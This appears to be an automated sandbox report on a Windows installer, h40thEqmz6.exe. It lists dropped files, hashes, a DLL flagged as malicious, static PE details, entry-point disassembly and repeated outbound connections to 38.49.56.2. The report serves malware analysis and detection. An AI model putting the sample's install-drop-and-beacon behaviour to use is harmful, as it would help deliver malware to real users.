Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp

Download File

Process:	C:\Users\user\Desktop\h40thEqmz6.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1160704
Entropy (8bit):	6.385672321945446
Encrypted:	false
SSDEEP:	24576:cYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5oNx9fX:nGUhni7iSFCQ6R
MD5:	8FDC58C7D4C59472615682D6DEA9D190
SHA1:	8E131FE09FD238493719B4FD92E6C833BF3596C1
SHA-256:	26A5BE637EE680B1EC11D1ADF2FD0972CC52078CBD200D9273F8BB826707C83B
SHA-512:	B05B9FD8FF3D627B562CBD2968466FB54ADBC2FA5591EBE803300A3C5EF7887BC1761D8013B47AAB0F5387265C8B7B15078A01ABB75D4C3180671780181EBE24
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O..........................................@..............................................@...............................7..................................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc................"..............@..@....................................@..@........................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp

Download File

Process:	C:\Users\user\Desktop\h40thEqmz6.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1160704
Entropy (8bit):	6.385672321945446
Encrypted:	false
SSDEEP:	24576:cYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5oNx9fX:nGUhni7iSFCQ6R
MD5:	8FDC58C7D4C59472615682D6DEA9D190
SHA1:	8E131FE09FD238493719B4FD92E6C833BF3596C1
SHA-256:	26A5BE637EE680B1EC11D1ADF2FD0972CC52078CBD200D9273F8BB826707C83B
SHA-512:	B05B9FD8FF3D627B562CBD2968466FB54ADBC2FA5591EBE803300A3C5EF7887BC1761D8013B47AAB0F5387265C8B7B15078A01ABB75D4C3180671780181EBE24
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O..........................................@..............................................@...............................7..................................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc................"..............@..@....................................@..@........................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-PH0LE.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.215994423157539
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
MD5:	4FF75F505FDDCC6A9AE62216446205D9
SHA1:	EFE32D504CE72F32E92DCF01AA2752B04D81A342
SHA-256:	A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
SHA-512:	BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-PH0LE.tmp\_isetup\_shfoldr.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	23312
Entropy (8bit):	4.596242908851566
Encrypted:	false
SSDEEP:	384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5:	92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:	3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:	9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:	9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\second_data_temp.zip

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	65792
Entropy (8bit):	7.9404734296406705
Encrypted:	false
SSDEEP:	1536:VhjcgGtMmfTymU88f4gtzyV+5klZq8BNP3DH+xbMf8KK/q47xtg:73dmUFffze+5oZq8BNP3T+u0fq4la
MD5:	3CCD20FE879B0B5E5027AF5616BA1523
SHA1:	9A32505698713F1217970DEE2CFADF01D658FF26
SHA-256:	39ADBB8DA7F27F5E1C5A2469DE371C8824C89FE2584318A604E8D2875A31762A
SHA-512:	442414566E24C6B50B831310431B6402032C34E8B5F0E11B7DD0B85380119352EB0BD35901820CC578F6F9B95ECAD1273DD396273ACFC01EC0C731182D80BBE9
Malicious:	false
Preview:	PK.........I.Y`O1.\....A......second_data.bin.\y\....F...>&.nrt!..6)7..].I..B.Q.Q.T.Q.7.b.+.+7Kd....?+..K2...;e.{_......?....\|....3.J':...i..b...j.YB.D.7<....`{iT.V.v.U...km.......,../.ug..'.y..l.L.o/?u.,....7...=....>.F%o.\:......._.v.d.%_...r......V.<..1.....$.Iwgg.....g?q}.te5....O.....+..kJj...x..^.m:..........W0.:6.....&..v....uh.... ...I...oY....v...,.<.t.l..,..,.......n^..w-t7.h{5wl.._L.p&=.y...V......N..Q2x...[..u.w...i\.=+lT.MWe......_:w.z....\|..e....n...x.?....Z....j..1...;kH..g..h.....Tn.7o...1g........q.\.^Lc./...........MuO..Y....f.\..\|...s..../....N.^$sut..........v.k..-...]..K.[_X...Yo...v..5.n...'-z...bm..S......ZoQ.e...g............^...}......G..=?&....[<.?.....^...r..Rh..\|.5% ......O.?......p............K..d'....~.Fj.....N.y...Sg....b.<.'f.A"....._\.nH...F.~.R.....R...:.>j.....4..`...Gf....../........O.?....=..S....>.t..+g..]..............O.M...D.ce........G=.K...Q./... .......0l..>^_,.9G\.m....7}tgt

C:\Users\user\AppData\Local\is-UGL1J.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1183079
Entropy (8bit):	6.3580271187790665
Encrypted:	false
SSDEEP:	24576:UYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5oNx9f6:vGUhni7iSFCQ6I
MD5:	B91B57B07E702422FC8755CAEA84A80A
SHA1:	B3E23888DC152B60D7E8AD4472EB3B1262AD1593
SHA-256:	4DDD13BE04F6EA9B83119DE95095887E47961F1DAC08C13978124BF8EEACFE36
SHA-512:	7AD7ED98F635C3B870370F56A0E7370C64D66C9FB7508843CC1C6D1FE06BD2D565DFD2BBC5F951A3878B9F3BB93EAEBCE2C0B8C79CDC66158174FE21D703AF55
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O..........................................@..............................................@...............................7..................................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc................"..............@..@....................................@..@........................................................................................................................................

C:\Users\user\AppData\Local\unins000.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp
File Type:	InnoSetup Log File Manager, version 0x418, 3453 bytes, 715575\37\user\37, C:\Users\user\AppData\Local\376\377\377\
Category:	dropped
Size (bytes):	3453
Entropy (8bit):	3.756044815307064
Encrypted:	false
SSDEEP:	96:/8M41dblhcpvwvJu82tiKiC6bufc1AGlEDA4MZAe2L/uHhcH:/8M41dphcpvcJu1i2f7fDSm/uHK
MD5:	06D2834692BB9FF57ECEC081E91CC588
SHA1:	4ECBD2A6299273BFE6B1D8BE3963DC47B30569CF
SHA-256:	C0950CE942FBD24B0BE10FD668C350517ED61B7175AD8FF0A1D8D3502B33CFEA
SHA-512:	81E955BC934954028C9A61B467C3B067498AD184E1485C37AC5E6372B61D9F8AC876C11D4E029A041FDD327E28DCD85CF2A6522FA774B4F7606C6798065C544F
Malicious:	false
Preview:	Inno Setup Uninstall Log (b)....................................File Manager....................................................................................................................File Manager............................................................................................................................}...%.................................................................................................................{D....N...Veq.......w........7.1.5.5.7.5......a.l.f.o.n.s......C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l................'.7.1.. ..............IFPS...............................................................................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.................!MAIN....-1..(...dll:shell32.dll.ShellExecuteW........................HASCMDLINEPARAM....26 @16..PARAMCOUNT.......COMPARETEXT.........PARAMSTR...........E.......INITIALI

C:\Users\user\AppData\Local\unins000.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1183079
Entropy (8bit):	6.3580271187790665
Encrypted:	false
SSDEEP:	24576:UYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5oNx9f6:vGUhni7iSFCQ6I
MD5:	B91B57B07E702422FC8755CAEA84A80A
SHA1:	B3E23888DC152B60D7E8AD4472EB3B1262AD1593
SHA-256:	4DDD13BE04F6EA9B83119DE95095887E47961F1DAC08C13978124BF8EEACFE36
SHA-512:	7AD7ED98F635C3B870370F56A0E7370C64D66C9FB7508843CC1C6D1FE06BD2D565DFD2BBC5F951A3878B9F3BB93EAEBCE2C0B8C79CDC66158174FE21D703AF55
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O..........................................@..............................................@...............................7..................................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc................"..............@..@....................................@..@........................................................................................................................................

C:\Users\user\AppData\Roaming\CacheData\DataLogs.conf

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	8
Entropy (8bit):	2.75
Encrypted:	false
SSDEEP:	3:Rt:v
MD5:	CF759E4C5F14FE3EEC41B87ED756CEA8
SHA1:	C27C796BB3C2FAC929359563676F4BA1FFADA1F5
SHA-256:	C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761
SHA-512:	C7F832AEE13A5EB36D145F35D4464374A9E12FA2017F3C2257442D67483B35A55ECCAE7F7729243350125B37033E075EFBC2303839FD86B81B9B4DCA3626953B
Malicious:	false
Preview:	.5.False

C:\Users\user\AppData\Roaming\Setup_Coat.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	742210
Entropy (8bit):	6.671551706055973
Encrypted:	false
SSDEEP:	12288:qSrdNvS+RGF3NPFH+CWigVHFMkDehBGpETe5u+:qibpkF3VFe8wFwcqTe5u+
MD5:	6D3053A6F23CB5B6BD374CEA07715AE8
SHA1:	8BCB4C3D4D2D6A22B7AF3382BFA38354244011E1
SHA-256:	5A6A75AE667580AB68530D72A351E906204514AABB4ACD241D31FA6E18D45B58
SHA-512:	A7C135CFC1CE5BA9ECBCDBA5F1698545CF16EAED5800BB63BDBBB995DA1A8726BEE79BDD4E4DD1B00671EB10A45BAF34466CF0FDF3FC2C1A906AEFCA3BEF5855
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...!.[K.X........&"...*.....T......0.....................................................`... .................................................................( ..............................................(...................................................text...............................`..`.data... .... ......................@....rdata..`....0......................@..@.pdata..( ......."..................@..@.xdata...G... ...H..................@..@.bss....`....p...........................edata...............6..............@..@.idata...............8..............@....CRT....`............N..............@....tls.................P..............@....reloc...............R..............@..B........................................................................................................................................................................

C:\Users\user\AppData\Roaming\is-CBKGS.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	742210
Entropy (8bit):	6.671551706055973
Encrypted:	false
SSDEEP:	12288:qSrdNvS+RGF3NPFH+CWigVHFMkDehBGpETe5u+:qibpkF3VFe8wFwcqTe5u+
MD5:	6D3053A6F23CB5B6BD374CEA07715AE8
SHA1:	8BCB4C3D4D2D6A22B7AF3382BFA38354244011E1
SHA-256:	5A6A75AE667580AB68530D72A351E906204514AABB4ACD241D31FA6E18D45B58
SHA-512:	A7C135CFC1CE5BA9ECBCDBA5F1698545CF16EAED5800BB63BDBBB995DA1A8726BEE79BDD4E4DD1B00671EB10A45BAF34466CF0FDF3FC2C1A906AEFCA3BEF5855
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...!.[K.X........&"...*.....T......0.....................................................`... .................................................................( ..............................................(...................................................text...............................`..`.data... .... ......................@....rdata..`....0......................@..@.pdata..( ......."..................@..@.xdata...G... ...H..................@..@.bss....`....p...........................edata...............6..............@..@.idata...............8..............@....CRT....`............N..............@....tls.................P..............@....reloc...............R..............@..B........................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.857829913884461
TrID:	Win32 Executable (generic) a (10002005/4) 98.86% Inno Setup installer (109748/4) 1.08% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	h40thEqmz6.exe
File size:	830'528 bytes
MD5:	e3ae2dc9b8b0582a266871b52e85c36f
SHA1:	f783d1d0354bf3ad1dc4e506e4df3250a89ee765
SHA256:	c344f9de1aa1bf284d8281aff7b216ca85b2dde7fc05e1d13b5abcef37d4ca0d
SHA512:	c670e3d4bd63e054ca9d70ff1588e1c263cf73ca24f1be6f9cde9222e6c351b87e9c2855b42c50f5b92eea7e683ec62b67a2e7c2a0dae1a29e080113435ad438
SSDEEP:	24576:qMjhsJkMwFz7D6h0lgoyM3VcH17lpMbTuIGVaiM2a:5zZFDaoIpMHGVa52a
TLSH:	74050202B3C30475E2550978DC56C498AD277D7929E4643B3EF8FB4F0A792C3AC7AA61
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	b8868baba9aba2d8

Static PE Info

General

Entrypoint:	0x416478
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x43D9DEF9 [Fri Jan 27 08:51:05 2006 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	483f0c4259a9148c34961abbda6146c1

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFA4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-3Ch], eax
mov dword ptr [ebp-40h], eax
mov dword ptr [ebp-5Ch], eax
mov dword ptr [ebp-30h], eax
mov dword ptr [ebp-38h], eax
mov dword ptr [ebp-34h], eax
mov dword ptr [ebp-2Ch], eax
mov dword ptr [ebp-28h], eax
mov dword ptr [ebp-14h], eax
mov eax, 004152B8h
call 00007F1CBCE75771h
xor eax, eax
push ebp
push 00416B45h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 00416B01h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [0041AB48h]
call 00007F1CBCE8401Bh
call 00007F1CBCE83BC2h
lea edx, dword ptr [ebp-14h]
xor eax, eax
call 00007F1CBCE7D844h
mov edx, dword ptr [ebp-14h]
mov eax, 0041D6E8h
call 00007F1CBCE73DA7h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [0041D6E8h]
mov dl, 01h
mov eax, dword ptr [0040F080h]
call 00007F1CBCE7E12Fh
mov dword ptr [0041D6ECh], eax
xor edx, edx
push ebp
push 00416AADh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007F1CBCE840A3h
mov dword ptr [0041D6F4h], eax
mov eax, dword ptr [0041D6F4h]
cmp dword ptr [eax+0Ch], 01h
jne 00007F1CBCE8540Ah
mov eax, dword ptr [0041D6F4h]
mov edx, 00000028h
call 00007F1CBCE7E5F8h
mov edx, dword ptr [0041D6F4h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1e000	0xf9e	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x21000	0xb230	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x20000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1e350	0x24c	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x143f8	0x14400	c9bb3afc1ceaaa31127ccfa204c657ef	False	0.5487316743827161	data	6.482216817915366	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x16000	0xbe8	0xc00	1ba5adf2e1058c0460dcc814ba86fb32	False	0.6246744791666666	data	6.005798728198158	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x17000	0xd9c	0xe00	d5b22eff9e08edaa95f493c1a71158c0	False	0.2924107142857143	data	2.669288666959085	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x18000	0x574c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x1e000	0xf9e	0x1000	b47eaca4c149ee829de76a342b5560d5	False	0.35595703125	data	4.9677831942996935	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x1f000	0x8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x20000	0x18	0x200	3746f5876803f8f30db5bb2deb8772ae	False	0.05078125	data	0.190488766434666	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x21000	0xb230	0xb400	89570a05fb7d8e1f4d603c10908743c6	False	0.1633029513888889	data	3.9726454947924217	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x213ec	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.16532258064516128
RT_ICON	0x216d4	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.32094594594594594
RT_ICON	0x217fc	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688	English	United States	0.18310234541577824
RT_STRING	0x226a4	0xc4	data			0.5969387755102041
RT_STRING	0x22768	0xcc	data			0.6225490196078431
RT_STRING	0x22834	0x174	data			0.5510752688172043
RT_STRING	0x229a8	0x39c	data			0.34523809523809523
RT_STRING	0x22d44	0x34c	data			0.4218009478672986
RT_STRING	0x23090	0x294	data			0.4106060606060606
RT_RCDATA	0x23324	0x82e8	data	English	United States	0.11261637622344235
RT_RCDATA	0x2b60c	0x10	data			1.5
RT_RCDATA	0x2b61c	0x1a0	data			0.8149038461538461
RT_RCDATA	0x2b7bc	0x2c	data			1.1818181818181819
RT_GROUP_ICON	0x2b7e8	0x30	data	English	United States	0.9583333333333334
RT_VERSION	0x2b818	0x4b8	COM executable for DOS	English	United States	0.3079470198675497
RT_MANIFEST	0x2bcd0	0x560	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4251453488372093

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll	GetKeyboardType, LoadStringW, MessageBoxA, CharNextW
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
user32.dll	CreateWindowExW, TranslateMessage, SetWindowLongW, PeekMessageW, MsgWaitForMultipleObjects, MessageBoxW, LoadStringW, GetSystemMetrics, ExitWindowsEx, DispatchMessageW, DestroyWindow, CharUpperBuffW, CallWindowProcW
kernel32.dll	WriteFile, WideCharToMultiByte, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, SizeofResource, SignalObjectAndWait, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, RemoveDirectoryW, ReadFile, MultiByteToWideChar, LockResource, LoadResource, LoadLibraryW, LeaveCriticalSection, InitializeCriticalSection, GetWindowsDirectoryW, GetVersionExW, GetUserDefaultLangID, GetThreadLocale, GetSystemInfo, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeProcess, GetEnvironmentVariableW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentProcess, GetCommandLineW, GetCPInfo, InterlockedExchange, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FindResourceW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateProcessW, CreateFileW, CreateEventW, CreateDirectoryW, CompareStringW, CloseHandle
advapi32.dll	RegQueryValueExW, RegOpenKeyExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW
comctl32.dll	InitCommonControls
kernel32.dll	Sleep
advapi32.dll	AdjustTokenPrivileges
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2025 07:40:22.568852901 CET	49730	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:22.573673010 CET	56005	49730	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:22.573760986 CET	49730	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:22.595937967 CET	49730	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:22.600724936 CET	56005	49730	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:24.133285999 CET	56005	49730	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:24.133344889 CET	49730	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:27.157881975 CET	49730	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:27.158145905 CET	49760	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:27.162734985 CET	56005	49730	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:27.162934065 CET	56003	49760	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:27.163007021 CET	49760	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:27.163230896 CET	49760	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:27.167983055 CET	56003	49760	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:28.745599985 CET	56003	49760	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:28.745676994 CET	49760	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:31.756373882 CET	49760	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:31.756727934 CET	49791	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:31.761295080 CET	56003	49760	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:31.761615038 CET	56003	49791	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:31.761718035 CET	49791	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:31.762007952 CET	49791	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:31.766762018 CET	56003	49791	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:33.358537912 CET	56003	49791	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:33.358617067 CET	49791	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:36.374108076 CET	49791	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:36.374310017 CET	49822	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:36.378978968 CET	56003	49791	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:36.379076004 CET	56004	49822	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:36.379143000 CET	49822	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:36.379453897 CET	49822	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:36.385425091 CET	56004	49822	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:37.965572119 CET	56004	49822	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:37.965840101 CET	49822	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:40.983058929 CET	49822	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:40.983315945 CET	49853	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:40.987960100 CET	56004	49822	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:40.988146067 CET	56005	49853	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:40.988214016 CET	49853	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:40.988487959 CET	49853	56005	192.168.2.5	38.49.56.2
